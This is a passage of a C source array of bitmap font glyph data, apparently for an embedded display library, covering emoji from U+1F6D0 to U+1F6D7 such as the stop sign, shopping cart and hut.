0x87, 0xe1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x87, 0xe1, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0x87, 0xe1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x87, 0xe1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x87, 0xe1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x87, 0xe1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x87, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xff,
/* U+1F6D0 "🛐" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0x0, 0x7e, 0x1, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x3, 0xff, 0xf0, 0xf,
0xff, 0xff, 0xff, 0xc0, 0x1f, 0xff, 0xff, 0x80,
0x7f, 0xff, 0xfe, 0x0, 0xff, 0xff, 0xff, 0xfc,
0x3, 0xff, 0xfe, 0x7, 0xff, 0xff, 0xff, 0xff,
0xe0, 0xff, 0xff, 0xbf, 0xff, 0xfc, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0xff, 0xf8,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x3f, 0xf8,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xf, 0xf8,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0x83, 0xf8,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0xf8,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x78,
0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x18,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x20, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x30, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x38, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x3e, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3f, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x80, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x80, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0, 0x0, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0, 0x0, 0xf, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0x0, 0x0, 0x3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x0, 0x3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfd,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0,
/* U+1F6D1 "🛑" */
0x0, 0x0, 0x3f, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x3f, 0xf, 0xff, 0xff, 0x87, 0xc0,
0x0, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xe1, 0xf0,
0x0, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xf8, 0x7e,
0x0, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xfe, 0x1f,
0x80, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xff, 0x87,
0xe0, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xe1,
0xf8, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xf8,
0x7e, 0x0, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xfe,
0x1f, 0x80, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xff,
0x87, 0xe0, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xff,
0xe1, 0xf8, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xff,
0xf8, 0x7e, 0x3f, 0xf, 0xff, 0xff, 0xff, 0xff,
0xfe, 0x1f, 0xbf, 0xf, 0xff, 0xff, 0xff, 0xff,
0xff, 0x87, 0xff, 0xf, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe1, 0xff, 0xf, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x7f, 0x8f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x3f, 0xcf, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x9f, 0xe7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xcf, 0xf3, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe7, 0xf9, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf3, 0xfc, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf9, 0xfe, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfc, 0xff, 0x3f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x7f, 0x9f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x3f, 0xcf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x9f, 0xe7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xcf, 0xf3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe7, 0xf9, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf3, 0xfc, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf9, 0xfe, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0xff, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x7f, 0x9f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x3f, 0xcf, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x9f, 0xe7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xcf, 0xf3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe7, 0xf9, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf3, 0xfc, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf9, 0xfe, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0xff, 0xf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7f, 0xc3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7f, 0xf0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0xfc, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x3f, 0xf,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0xf, 0xc3,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x3, 0xf0,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0xfc,
0x3f, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0x3f,
0xf, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0xf,
0xc3, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0x3,
0xf0, 0xff, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0x0,
0xfc, 0x3f, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0x0,
0x3f, 0xf, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0x0,
0xf, 0xc3, 0xff, 0xff, 0xf8, 0x7e, 0x0, 0x0,
0x3, 0xf0, 0xff, 0xff, 0xf8, 0x7c, 0x0, 0x0,
0x0, 0xfc, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x3f, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x3, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xfc, 0x0, 0x0,
0x0,
/* U+1F6D2 "🛒" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x78, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x0, 0xe, 0x18, 0x8, 0x18, 0x18, 0x10,
0x18, 0x0, 0x70, 0xc0, 0x40, 0xc1, 0x80, 0x81,
0x80, 0x3, 0x86, 0x6, 0x6, 0xc, 0x8, 0xc,
0x0, 0x1c, 0x30, 0x30, 0x20, 0x60, 0x40, 0xe0,
0x0, 0xe1, 0x81, 0x83, 0x3, 0x6, 0x6, 0x0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0, 0x0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x1,
0xc3, 0x3, 0x6, 0xc, 0x18, 0x18, 0x0, 0xe,
0x18, 0x10, 0x20, 0xc0, 0x81, 0xc0, 0x0, 0x70,
0xc0, 0x83, 0x6, 0x4, 0xc, 0x0, 0x3, 0x86,
0xc, 0x18, 0x30, 0x60, 0xe0, 0x0, 0x1c, 0x30,
0x60, 0xc1, 0x82, 0x6, 0x0, 0x0, 0xe1, 0x83,
0x6, 0x18, 0x30, 0x70, 0x0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0x80, 0x0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x1, 0xc3, 0x6, 0x18,
0x30, 0xc1, 0xc0, 0x0, 0xe, 0x18, 0x20, 0xc3,
0x6, 0xe, 0x0, 0x0, 0x70, 0xc1, 0x6, 0x18,
0x20, 0xe0, 0x0, 0x3, 0x86, 0x18, 0x20, 0xc3,
0x7, 0x0, 0x0, 0x1c, 0x30, 0xc3, 0x4, 0x18,
0x70, 0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x7, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x3, 0xc0, 0x0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xfc, 0x0, 0x0, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x0, 0xf, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0, 0x0, 0x70, 0xf8, 0x0, 0x0,
0x1f, 0x0, 0x0, 0x1, 0x7, 0xc0, 0x0, 0x0,
0xf8, 0x0, 0x0, 0x0, 0x7f, 0x0, 0x0, 0xf,
0xe0, 0x0, 0x0, 0x7, 0xfc, 0x0, 0x0, 0xff,
0x80, 0x0, 0x0, 0x37, 0x70, 0x0, 0xe, 0xee,
0x0, 0x0, 0x1, 0xb9, 0x80, 0x0, 0x67, 0x30,
0x0, 0x0, 0xc, 0xcc, 0x0, 0x3, 0x39, 0x80,
0x0, 0x0, 0x60, 0x60, 0x0, 0x18, 0xc, 0x0,
0x0, 0x3, 0x7, 0x0, 0x0, 0xe0, 0xe0, 0x0,
0x0, 0x1c, 0x70, 0x0, 0x3, 0x8e, 0x0, 0x0,
0x0, 0x7f, 0x0, 0x0, 0xf, 0xe0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x3e, 0x0, 0x0, 0x0,
/* U+1F6D5 "🛕" */
0x0, 0x0, 0x0, 0x60, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7c, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x3, 0x0,
0xc, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x3, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0,
0x3f, 0xff, 0xc0, 0x0, 0x0, 0x0, 0xf, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x7, 0x80, 0x1, 0xc0,
0x0, 0x0, 0x1, 0xe0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x78, 0x0, 0x1, 0xc0, 0x0, 0x0, 0xe,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x3, 0x80, 0x0,
0x3, 0x80, 0x0, 0x6, 0xe0, 0x0, 0x0, 0x3b,
0x80, 0x0, 0xdc, 0x0, 0x60, 0x7, 0x60, 0x0,
0x3f, 0x0, 0xc, 0x0, 0xfe, 0x0, 0x7, 0xe0,
0x1, 0x80, 0xf, 0xe0, 0x1, 0xfc, 0x0, 0x78,
0x1, 0xfc, 0x0, 0x1f, 0x80, 0x1f, 0x80, 0x3f,
0x80, 0x3, 0x70, 0x1, 0xe0, 0x7, 0x30, 0x0,
0x6e, 0x0, 0x7e, 0x0, 0xe6, 0x0, 0xd, 0xc0,
0xf, 0xc0, 0x1c, 0xc0, 0x7, 0xf8, 0x3, 0xfc,
0x3, 0xfc, 0x0, 0xff, 0x0, 0x33, 0x0, 0x7f,
0x80, 0xc, 0xe0, 0xc, 0x30, 0xe, 0x30, 0x1,
0x9c, 0x3, 0xff, 0x1, 0xc6, 0x0, 0x33, 0x80,
0xff, 0xf0, 0x38, 0xc0, 0xf, 0xf0, 0x1f, 0xfe,
0x7, 0xfc, 0x1, 0xfe, 0x7, 0xff, 0xe0, 0xff,
0x80, 0x31, 0xc0, 0xc0, 0xc, 0x1c, 0x20, 0x6,
0x38, 0x7f, 0xff, 0xe3, 0x84, 0x1, 0xff, 0xf,
0xff, 0xfc, 0x7f, 0xc0, 0x3f, 0xe3, 0xff, 0xff,
0xcf, 0xfc, 0x6, 0x1c, 0x7f, 0xff, 0xf9, 0xc1,
0x0, 0xc3, 0x9f, 0xff, 0xff, 0x38, 0x20, 0x18,
0x71, 0xc0, 0x0, 0xe7, 0x4, 0x3, 0xe, 0x38,
0x0, 0x1c, 0xe0, 0x81, 0xff, 0xc7, 0x3f, 0xf3,
0x9f, 0xfc, 0x3f, 0xf8, 0xe7, 0xfe, 0x73, 0xff,
0x83, 0x7, 0x1c, 0xff, 0xce, 0x70, 0x60, 0x60,
0xe3, 0x9f, 0xf9, 0xce, 0xc, 0xc, 0x1c, 0x73,
0xff, 0x39, 0xc1, 0x81, 0x83, 0x8e, 0x7f, 0xe7,
0x38, 0x30, 0x30, 0x71, 0xcf, 0xfc, 0xe7, 0x6,
0x6, 0xe, 0x39, 0xff, 0x9c, 0xe0, 0xc0, 0xc1,
0xc7, 0x3f, 0xf3, 0x9c, 0x18, 0x18, 0x38, 0xe7,
0xfe, 0x73, 0x83, 0x1f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x0, 0x3f, 0xff, 0xfe, 0x0,
0xf, 0xff, 0xff, 0x0, 0x7, 0xc0, 0x1, 0x80,
0x0, 0x60, 0x0, 0xff, 0xff, 0xf0, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F6D6 "🛖" */
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0,
0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x78,
0x0, 0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0xf, 0x0, 0x0, 0x6, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x0, 0x1c, 0x7, 0x80,
0x0, 0x0, 0x3, 0xc0, 0x0, 0x0, 0x38, 0xf,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x60,
0x1e, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0xc0, 0x3c, 0x0, 0x0, 0x3, 0x80, 0x40, 0x0,
0x3, 0x80, 0x70, 0x0, 0x0, 0x1c, 0x3, 0x80,
0x0, 0x0, 0x0, 0xe0, 0x0, 0x0, 0xe0, 0xc,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x7, 0x80,
0x60, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x3c,
0x0, 0x80, 0x0, 0x0, 0x6, 0xf, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x40, 0x1c, 0x1c, 0x0,
0x7, 0x6, 0x0, 0x0, 0x3, 0x0, 0x30, 0x38,
0x0, 0x3c, 0x30, 0x0, 0x0, 0x6, 0x0, 0x60,
0xf0, 0x1, 0xe0, 0xc0, 0x0, 0x0, 0xc, 0x0,
0xc1, 0xe0, 0x7, 0x6, 0x0, 0x0, 0x0, 0x30,
0x3, 0x3, 0x80, 0x3c, 0x8, 0x0, 0x0, 0x0,
0x60, 0x4, 0xf, 0x0, 0xe0, 0x0, 0x0, 0x0,
0x1, 0x80, 0x0, 0x1c, 0x7, 0x0, 0x0, 0x0,
0x0, 0x6, 0x0, 0x0, 0x38, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc0, 0x1, 0xc3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x7, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x0, 0xe,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0x0,
0x39, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x60, 0xc3,
0x86, 0x18, 0x30, 0x61, 0x87, 0xc, 0x39, 0xc7,
0x9e, 0x7c, 0xf1, 0xe3, 0xcf, 0x9e, 0x78, 0xe3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x7, 0xef, 0x3c, 0x79, 0xe1, 0xe7, 0x8f, 0x3d,
0xf8, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0xe0, 0x0, 0x1, 0xff,
0xe0, 0x0, 0x1, 0xc0, 0x3, 0x80, 0x0, 0x7,
0xff, 0x80, 0x0, 0x7, 0x0, 0xe, 0x0, 0x0,
0x1f, 0xfe, 0x0, 0x0, 0x1c, 0x0, 0x38, 0x0,
0x0, 0x7f, 0xf8, 0x0, 0x0, 0x70, 0x0, 0xe0,
0x0, 0x1, 0xff, 0xe0, 0x0, 0x1, 0xc0, 0x3,
0x80, 0x0, 0x7, 0xff, 0x80, 0x0, 0x7, 0x0,
0xe, 0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0, 0x1c,
0x0, 0x38, 0x0, 0x0, 0x7f, 0xf8, 0x0, 0x0,
0x70, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe0, 0x7f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x81, 0xc0, 0x0, 0x0, 0x7f,
0xf8, 0x0, 0x0, 0xe, 0x7, 0x0, 0x0, 0x1,
0xff, 0xe0, 0x0, 0x0, 0x38, 0x1c, 0x0, 0x0,
0x7, 0xff, 0x80, 0x0, 0x0, 0xe0, 0x70, 0x0,
0x0, 0x1f, 0xfe, 0x0, 0x0, 0x3, 0x81, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
/* U+1F6D7 "🛗" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfd, 0xff, 0xfc, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0xff, 0xfe, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3f, 0xff, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xfe, 0xf, 0xff, 0x9f, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3, 0xff, 0xcf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc7, 0xff, 0xe7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe3, 0xff, 0xf3, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf1, 0xff, 0xf9, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0xff, 0xe0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xfc, 0x7f, 0xf8, 0xf,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x3f, 0xfe, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0x1f, 0xff, 0x8f,
0xff, 0xff, 0xff, 0xff, 0xff, 0x8f, 0xff, 0xef,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x3, 0xff, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xf1, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x7f, 0xff, 0xf8, 0xff, 0xff, 0xff,
0xff, 0xff, 0x3f, 0xff, 0xfc, 0x7f, 0xff, 0xff,
0xff, 0xff, 0x9f, 0xff, 0xfe, 0x3f, 0x9f, 0xf3,
0xff, 0x1f, 0xcf, 0xff, 0xff, 0x1f, 0xc7, 0xf8,
0xff, 0xf, 0xe7, 0xff, 0xff, 0x8f, 0xe3, 0xfc,
0x7f, 0x87, 0xf3, 0xff, 0xff, 0xc7, 0xf3, 0xfe,
